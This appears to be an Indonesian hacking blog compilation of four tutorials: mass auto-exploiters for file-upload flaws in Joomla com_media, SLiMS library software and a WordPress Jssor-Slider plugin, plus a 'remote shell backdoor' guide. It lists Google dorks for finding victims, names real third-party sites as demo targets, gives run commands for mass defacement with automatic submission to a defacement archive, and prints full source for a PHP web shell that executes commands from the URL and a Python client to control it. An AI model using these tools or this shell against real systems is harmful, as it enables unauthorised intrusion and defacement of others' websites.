Joomla Com_Media Auto Exploiter


#########################################################################
# Exploit Title: Joomla Remot File Upload Vulnerability
#########################################################################
#Reference : https://cxsecurity.com/issue/WLB-2015110194
# Google Dork1: inurl:index.php?option=com_media & site:com
# Google Dork2: inurl:index.php?option=com_media & site:org
# Google Dork3: inurl:index.php?option=com_media & site:net
# Date: [22/11/2015]
# Exploit Author: Guardiran Security Team =>DeMoN
# Vendor Homepage: [https://developer.joomla.org/joomlacode-archive/issue-29776.html]
# Software Link: [-]
# Version: All Version
# Tested on: [Win 8.1/Google chrome]
# CVE : [-]
#########################################################################
# DISCRIPTION: Hello Guys.This Is A Olugin Of Joomla For Upload Files.
# Exploit:
# Add This Link After Address Target
# /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder
# For Exmple: 
Site.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder
#########################################################################
#Demo :
http://www.poesiederfuesse.de/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder
http://www.blumen-silvia.de//index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder
#########################################################################
Download Auto Exploiter : Alternatif1 Alternatif2
#########################################################################
How to use ?
Pertama cari dulu targetnya kemudian simpan list target dalam bentuk txt ,dan siapkan file defacenya berupa file txt atau gambar (.jpg, .png, .gif) satu folderkan dengan autoexploiternya. Jika menggunakkan xampp simpan di folder /xampp/perl/bin/ kemudian jalankan dengan menggunakkan perintah:
perl exploit.pl list.txt filedeface.jpg


Tunggu sampai program selesai kemudian hasilnya akan tersimpan auto ke save.txt, dan untuk situs yang berhasil terinfeksi akan otomatis tersubmit kezone h. edit dulu dalam scriptnya pada bagian
'defacer'     => 'Nick kamu',

Baiklah sekian yang bisa saya sampaikan mohon maaf bila ada kesalahan . Wassallam. 

Slims CMS Senayan Auto Exploiter (Web Perpustakaan)


########################################################################

#Reference : https://packetstormsecurity.com/files/151676/Slims-CMS-Senayan-Library-Management-System-7.0-Shell-Upload.html
# Exploit Title : Slims CMS Senayan Library Management System 7.0 Arbitrary File Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Team
# Date : 13/02/2019
# Vendor Homepage : slims.web.id
# Software Download Link : github.com/slims/
github.com/slims/slims8_akasia/archive/master.zip
github.com/slims/slims7_cendana/archive/master.zip
github.com/slims/s3st15_matoa/archive/master.zip
github.com/slims/slims5_meranti/archive/master.zip
github.com/slims/s3st14/archive/master.zip
# Software Information Link : slims.web.id/web/ * slims.web.id/goslims/
# Software Affected Version : 5/6/7 and previous versions
# Tested on : Windows / Linux
# Exploit Risk : High
# CXSecurity Exploit Reference Link : cxsecurity.com/ascii/WLB-2018050260

########################################################################
########################################################################

#Google Dork 1 :  intext:''The Winner in the Category of OSS Indonesia ICT Award 2009''

#Google Dork 2 : inurl:''index.php?p=show_detail&id='' site:id

#Google Dork 3 : inurl:''/slims5-meranti/'' site:id

#Google Dork 4 : intext:This software and this template are released Under GNU GPL License Version 3. The Winner in the Category of OSS Indonesia ICT Award 2009''

#Google Dork 5 : Powered by SLiMS site:id

#Google Dork 6 : Powered by SLiMS | Design by Indra Sutriadi Pipii

#Google Dork 7 : Beranda Depan * Info Perpustakaan * Area Anggota * Pustakawan * Bantuan Pencarian * MASUK Pustakawan. 

#Google Dork 8 : Akses Katalog Publik Daring - Gunakan fasilitas pencarian untuk mempercepat penemuan data katalog.

#Google Dork 9 :  SLiMS (Senayan Library Management System) is an open source Library Management System. 
                           It is build on Open source technology like PHP and MySQL.

#Google Dork 10 : PERPUSTAKAAN - Web Online Public Access Catalog - Use the search options to find documents quickly
This software and this template are released Under GNU GPL License Version 3

#Google Dork 11 : inurl:''/index.php?select_lang='' site:sch.id

#Google Dork 12 : Web Online Public Access Catalog - Gunakan fasilitas pencarian untuk mempercepat anda menemukan data katalog

#Google Dork 13 : Welcome To Senayan Library's Online Public Access Catalog (OPAC). Use OPAC to search collection in our library.

#Google Dork 14 : O.P.A.C. (On-line Public Access Catalogue)

#Google Dork 15 : inurl:''/perpustakaan/repository/'' site:id

#Google Dork 16 : Senayan | Open Source Library Management System :: OPAC

########################################################################

########################################################################
Exploit : /admin/modules/bibliography/pop_attach.php
Download Exploiter : Alternatif1 Alternatif2
#########################################################################
Tutorial:
Pertama edit dulu scriptnya pada bagian dibawah ini
$shell = "dx.txt"; < file shell / deface kamu (satu folderkan)

Kemudian jalankan program dan masukan file list target kalian.
Ketikan perintah :
php exploit.php

Setelah selesai cek hasilnya di file laporan.txt (satu folder).
Sekian dan terimakasih, wasallam.


WordPress Jssor-Slider Library Plugin Arbitrary Exploiter


###########################################################################

# Exploit Title : WordPress DrcSystems EthicSolutions Jssor-Slider Library Plugin Arbitrary File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
#Reference : https://cxsecurity.com/issue/WLB-2018060226
# CWE : CWE-284 [ Improper Access Control ] -  CWE-862  [ Missing Authorization ]
#Dork : inurl:/wp-content/jssor-slider
#Exploit : http://[PATH]/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
#Shell Path : http://[PATH]//wp-content/jssor-slider/jssor-uploads/shell.txt
#Download Exploiter : Alternatif1   Alternatif2

###########################################################################

Jangan lupa download dulu exploiternya simpan dengan extensi *.pl (perl), okeh langsung saja.
Pertama jalankan program exploiternya kemudian masukan nama file list target dan shell / file deface kamu seperti dibawah ini. Dengan mengetikan perintah pada terminal:
cmd:\path>perl exploiter.pl


Selanjutnya tinggal tunggu saja exploiter bekerja dan lihat keterangan yang diberikan program.


Jika shell berhasil terupload maka akan auto tersimpak ke dalam file  report.txt .


Cukup sekian dan terimakasih mohon maaf bila ada kesalahan.

Remote Shell Backdoor With Python and PHP



Selamat sore sobat IT pada tutorial kali ini saya akan membagi trik Remot Shell Backdoor dengan python dan php. Yaitu kalian mengakses shell backdoor kalian melalui terminal / cmd kalian tapi ini buka backconnect ya wkwkwk. Jadi awalnya tuh saya sedang mencari tutorial exploit fuel cms terus nemu script ini deh sumber: https://www.exploit-db.com/exploits/47138 Terus saya edit edit dikit deh biar kaya gini gak papa kan :'V
Langsung saja skuy lur.

Pertama buatlah sebuah file backdoor untuk diupload ke website target kalian scriptnya dibawah ini
Script cmd.php:
<?php

function path() {

 if(isset($_GET['dir'])) {

  $dir = str_replace("\\", "/", $_GET['dir']);

  @chdir($dir);

 } else {

  $dir = str_replace("\\", "/", getcwd());

 }

 return $dir;

}

echo "Current Dir:>".path();



    if(isset($_GET['cmd'])){

  

        echo system($_GET['cmd']);

    

    }



?>



Pastikan kalian telah mengupload backdoor kalian ke target yang mau diremot nanti.
Okeh setelah memastikan shell kalian terupload dan bisa dicoba selanjutnya buatlah file python untuk meremot shell kalian . scriptnya dibawah ini:
Script remot.py:
import requests

import urllib



url = input('Input Target: ')

def find_nth_overlapping(haystack, needle, n):

    start = haystack.find(needle)

    while start >= 0 and n > 1:

        start = haystack.find(needle, start+1)

        n -= 1

    return start



while 1:

 xxxx = input('cmd:')

 burp0_url = url+xxxx

 proxy = {"http":url}

 r = requests.get(burp0_url, proxies=proxy)



 html = "<!DOCTYPE html>"

 htmlcharset = r.text.find(html)



 begin = r.text[0:20]

 dup = find_nth_overlapping(r.text,begin,2)



 print (r.text[0:dup])



Saya menggunakan python3. okeh selanjutnya jalankan program python nya diterminal kalian kemudian masukkan targetnya seperti dibawah ini:
http://target.com/[path]/cmd.php?cmd=

dan selanjutnya tinggal menjalankan perintah perintah command nya sesuai servernya ya gan, target ane servernya linux.

Sekian yang dapat saya sampaikan , mohon maaf bila ada kesalahan dan kekurangan . Mohon kembangkan lagi karena ilmu saya terbatas semoga tutorial ini bermanfaat.
Terima kasih.